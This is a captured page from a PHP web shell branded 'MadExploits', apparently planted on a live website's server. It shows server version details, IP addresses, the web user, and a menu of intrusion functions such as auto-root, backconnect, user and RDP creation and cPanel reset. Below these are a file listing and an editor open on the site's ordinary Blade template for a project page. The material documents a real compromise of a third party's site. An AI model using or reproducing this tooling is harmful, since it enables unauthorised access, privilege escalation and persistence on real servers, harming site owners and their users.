Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.231.17
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
arcusdesignz.com /
source /
resources /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
client_panel
[ DIR ]
drwxr-xr-x
emails
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
exports
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
about_us.blade.php
18.64
KB
-rw-r--r--
blogs.blade.php
3.17
KB
-rw-r--r--
contact_us.blade.php
13.09
KB
-rw-r--r--
index.blade.php
58.91
KB
-rw-r--r--
index_old.blade.php
9.71
KB
-rw-r--r--
portfolio.blade.php
5.45
KB
-rw-r--r--
post.blade.php
2.35
KB
-rw-r--r--
privacy_security.blade.php
829
B
-rw-r--r--
project_detail.blade.php
4.59
KB
-rw-r--r--
projects.blade.php
1.66
KB
-rw-r--r--
review.blade.php
9.18
KB
-rw-r--r--
search.blade.php
13.68
KB
-rw-r--r--
service_detail.blade.php
30.77
KB
-rw-r--r--
services.blade.php
21.78
KB
-rw-r--r--
sitemap.blade.php
5.96
KB
-rw-r--r--
sitemapxml.blade.php
2.34
KB
-rw-r--r--
templates.blade.php
42.18
KB
-rw-r--r--
terms.blade.php
760
B
-rw-r--r--
thank_you.blade.php
1.66
KB
-rw-r--r--
welcome.blade.php
72.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : project_detail.blade.php
@extends('layouts.app') @section('contents') <!-- ========== Header ========== --> <header id="dsn_header" class="dsn-header-animation show-box-shadow dsn-container section-padding v-dark-head"> <div class="entry-header p-relative over-hidden"> <div class="p-absolute dsn-hero-parallax-img over-hidden before-z-index z-index-1 full-width" id="hero_image" data-dsn-ajax="img" data-overlay="3"> <img class="cover-bg-img transform-3d" src="{{asset('assets/projects/'.$project->image)}}" alt=""/> </div> <div id="hero_content" class="d-flex align-items-end p-relative h-100 dsn-hero-parallax-title container"> <div class="content p-relative "> <div class="intro-project w-100"> <div class="intro-title "> <div id="dsn_metas" class="p-relative d-flex justify-content-between "> <div class="metas has-separate p-relative mb-10"> <span>{{$project->type}}</span> </div> </div> <div id="hero_title"> <h1 class="title" data-dsn-ajax="title">{{$project->title}}</h1> </div> <p class="subtitle-meta metas p-relative mt-10 heading-color"><b>Published : </b> {{date('F d Y', strtotime($project->created_at))}}</p> </div> </div> </div> </div> </div> <a class="background-main move-circle link-project p-absolute" data-dsn="parallax" href="{{$project->url}}" target="_blank" rel="nofollow"> VISIT SITE <svg viewBox="0 0 1024 1024" version="1.1" xmlns="../../../www.w3.org/2000/svg.html"> <path d="M213.333333 750.506667L665.173333 298.666667H384V213.333333h426.666667v426.666667h-85.333334V358.826667L273.493333 810.666667 213.333333 750.506667z"/> </svg> </a> <a href="#page_wrapper" rel="nofollow" class="dsn-scroll-bottom" data-dsn-option='{"ease": "power4.inOut" , "duration" : 1.5}'> <div class="text">SCROLL</div> </a> </header> <!-- ========== End Header ========== --> <div id="page_wrapper" class="wrapper"> <!-- ========== Info Project ========== --> <div class="info-project container text-center section-margin"> <ul class="intro-project-list mt-30 d-grid grid-md-3 grid-sm-2 "> <li class="dsn-up grid-item number-item"> <h5 class="title-list-project sm-title-block">Service</h5> <p class="description-list-project dsn-auto">{{$project->type}}</p> </li> <li class="dsn-up grid-item number-item"> <h5 class="title-list-project sm-title-block">Industry</h5> <p class="description-list-project dsn-auto">{{$project->industry}}</p> </li> <li class="dsn-up grid-item number-item"> <h5 class="title-list-project sm-title-block">Published</h5> <p class="description-list-project dsn-auto">{{date('F d Y', strtotime($project->created_at))}}</p> </li> </ul> </div> <!-- ========== End Info Project ========== --> <!-- ========== Parallax Image With Popup ========== --> @foreach($images as $k=> $img) <div class="img-box-parallax before-z-index has-popup" data-dsn-triggerhook="top" data-dsn-grid="move-up"> <div class="effect-popup before-z-index h-100" data-src="{{asset('assets/projects-gallery/'.$img->image)}}" data-caption="Caption #{{$k+1}}" data-fancybox="_1" data-cursor="open" data-dsn-overlay="3"> <img src='{{asset('assets/projects-gallery/'.$img->image)}}' class="cover-bg-img has-direction" data-dsn-speed="100%" alt=''/> </div> <div class="cap"> <span>Caption #{{$k+1}}</span> </div> </div> @endforeach <!-- ========== End Parallax Image With Popup ========== --> <!-- ========== Parallax Image With Popup ========== --> <!-- ========== End Parallax Image With Popup ========== --> <!-- ========== End Parallax Image With Popup ========== --> <!-- ========== End Parallax Image With Popup ========== --> </div> @endsection
Close